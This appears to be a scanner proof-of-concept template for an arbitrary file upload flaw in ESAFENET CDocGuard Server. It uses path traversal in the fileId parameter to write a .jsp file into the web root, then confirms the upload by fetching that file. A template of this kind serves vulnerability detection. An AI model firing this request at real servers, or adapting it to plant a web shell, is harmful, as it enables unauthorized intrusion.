name: poc-yisaitong-S2-fileupload
set:
  r1: randomLowercase(4)
  randbody: randomLowercase(32)
  rboundary: randomLowercase(8)
rules:
  - method: POST
    path: '/CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/{{r1}}.jsp'
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Cookie: JSESSIONID=B9964151074C71F115A9C803FFF05C34
      Upgrade-Insecure-Requests: 1
    body: 
      "{{randbody}}"
    expression: | 
      response.status == 200
  - method: GET
    path: '/CDGServer3/{{r1}}.jsp'
    expression: |
      response.status == 200 && response.body.bcontains(b'{{randbody}}')
detail:
  author: test